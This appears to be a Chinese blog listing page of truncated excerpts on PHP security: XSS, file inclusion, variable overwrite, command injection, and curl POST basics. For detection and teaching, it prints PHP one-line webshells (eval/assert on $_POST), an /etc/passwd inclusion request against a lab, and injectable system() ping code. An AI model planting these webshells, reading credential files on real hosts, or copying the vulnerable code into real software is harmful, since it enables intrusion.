漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露、cookie伪造、CSRF(跨站请求)等。这些漏洞不仅仅是针对PHP语言的,本文只是简单介绍PHP如何有效防止这些漏洞。1.xss + sql注入其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一做一次XSS和SQL注入的过滤。用PHP写个过滤函数,可由如下所示:
原创
2021-03-21 11:02:33
423阅读
post方式下的XSS漏洞应用下面来演示一下pos方式下的XSS漏洞首先来打开一下post型的XSS 2.直接登录一下一个案例,跟反射型的XSS是一样的,只过是这个地方的提交方式是以post的方式提交的 提交一个参数,我们可以发现其实它并没有在UIL里面穿这个参数 我们可以看一下抓包,在burpsuit里message是直接通过请求体通过post方式传到后台的,虽然这个地方也存在xss但是请求是p
转载
2024-04-10 04:35:46
17阅读
节后回来第一件事就是查细节问题。其他一WebServer 报错expire: not foundexpire: not foundexpire: not found一秒钟几十个的冒。。。那个汗啊首先想到 expire 模块问题。。。为了不影响业务耐着 等到晚上处理,干脆性的直接注释掉 expire 模块。 重启apache 【环境基于 FreeBSD7.2 apache2.2 php mysql】
推荐
原创
2010-02-24 11:09:33
1879阅读
点赞
2评论
php木马一般含有<?php eval($_POST[cmd]);?>或者<?php assert($_POST[cmd]);?>find ./ -type f -name "*" | xargs grep "eval("http://bbs.dianlan.cn/phpimg/bbs/upload/2731435152797.jpg/.php37351437201717.
原创
2015-10-29 10:18:34
488阅读
利用docker复现该漏洞,访问http://192.168.80.156:8080/phpinfo.php,可以看到页面出现phpinfo页面再访问http://192.168.80.156:8080/lfi.php?file=/etc/passwd,可以看到该页面是存在文件包含漏洞的。 先讲一下利用phpinfo上传文件,然后在文件包含的原理:参考链接:https://g
转载
2023-07-31 19:15:57
304阅读
### 实现 PHP Curl Post 的步骤及代码示例
#### 步骤概览
首先,让我们了解一下如何通过 PHP 中的 Curl 库进行 Post 请求。
| 步骤 | 描述 |
| ---- | ------------------------ |
| 1 | 初始化 Curl 实例 |
| 2 | 设置 Curl 选
原创
2024-04-25 11:08:56
89阅读
例子<form actio
转载
2021-12-31 14:33:13
94阅读
在 PHP 中,预定义的 $_POST 变量用于收集来自 method=“post” 的表单中的值。$_POST 变量预定义的 $_POST 变量用于收集来自 method=“post” 的表单中的值。
原创
2022-06-16 17:00:58
100阅读
area.php<?php$username = $_POST['username'];$password = $_POST['password'];if($username == 'zxl' and $password ==
原创
2023-05-10 00:01:19
113阅读
PHP POST 请求方式
原创
2021-08-13 10:39:41
214阅读
/** * 模拟post进行url请求 * @param string $url * @param array $post_data */ function request_post($url = '', $post_data = array()) { if (empty($url) || empty($post_data)) {
原创
2022-11-21 17:42:53
321阅读
function http_post($url, $data_string) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_set
原创
2022-05-31 21:51:51
291阅读
$_POST 变量 预定义的 $_POST 变量用于收集来自 method="post" 的表单中的值。 从带有 POST 方法的表单发送的信息,对任何人都是不可见的(不会显示在浏览器的地址栏),并且对发送信息的量也没有限制。 注释:然而,默认情况下,POST 方法的发送信息的量最大值为 8 MB(
原创
2018-01-31 17:03:00
425阅读
漏洞名称discuz7.0 _post.php xss跨站漏洞发布时间2014-06-02漏洞分类反射型xss漏洞缺陷代码没有对所有参数进行过滤。if($action == 'reply') { $addfeedcheck = $customaddfeed & 4 ? 'checked="checked"': '';} elseif(!empty($special) &&am
原创
2022-07-08 13:31:01
108阅读
过一阵需要做一个php的项目,最近在学习php,因为以前做过j2ee的项目,使用到了jsp和servlet,所以在学习php的过程中不自觉的对这两种技术做了一些对比,有了一些自己的想法,在这里做一下纪录,因为刚开始接触php,理解还不深入,所以要有什么谬误,希望大家海涵,同时可以给我指出来,在这里先谢谢了! 首先谈谈
转载
2023-07-09 20:52:36
67阅读
针对PHP 的网站主要存在下面几种攻击方式:
1、命令注入(CommandInjection)
2、eval 注入(Eval Injection)
3、客户端脚本攻击(Script Insertion)
转载
2014-07-04 14:42:28
544阅读
〝 古人学问遗无力,少壮功夫老始成 〞:因为PHP是弱类型语言,所以内置的很多函数,在进行转换和比较的时候,会有各种漏洞需要格外关注。不然很容易在安全上造成各种各样的漏洞,当然平时可能问题不会显现,但是如果人家恶意攻击,这将首当其冲,必然安全部门首先让你来背锅,所以代码能严格就要严格,尽量在平时养成 ...
转载
2021-07-25 19:38:00
333阅读
文章 PHP中的变量覆盖 简介 变量覆盖 自定义的参数值替换原有变量值的情况称为变量覆盖 经常导致变量覆盖场景有:开启了全局变量注册、$$ 使用不当、extract() 函数使用不当、parse_str() 函数使用不当、import_request_variables() 使用不当
原创
2022-01-21 11:39:02
849阅读
原文链接:https://blog.csdn.net/cherrie007/article/details/77473817 strcmp漏洞 注:这一个漏洞适用与5.3之前版本的php 我们首先看一下这个函数,这个函数是用于比较字符串的函数 int strcmp ( string $str1 , ...
转载
2021-08-30 08:31:00
422阅读
2评论
命令注入将用户输入拼接到命令行中执行,导致的任意命令执行问题。例子<?php
$command = 'ping -c 1 '.$_GET['ip'];
system($command); //system函数特性 执行结果会自动打印
?>这是一段简单的php代码,专门执行ping 命令并输出内容。正常输入: /xxx.php?ip=114.114.114.114
执行命令 ping -
转载
2023-11-24 09:51:56
782阅读
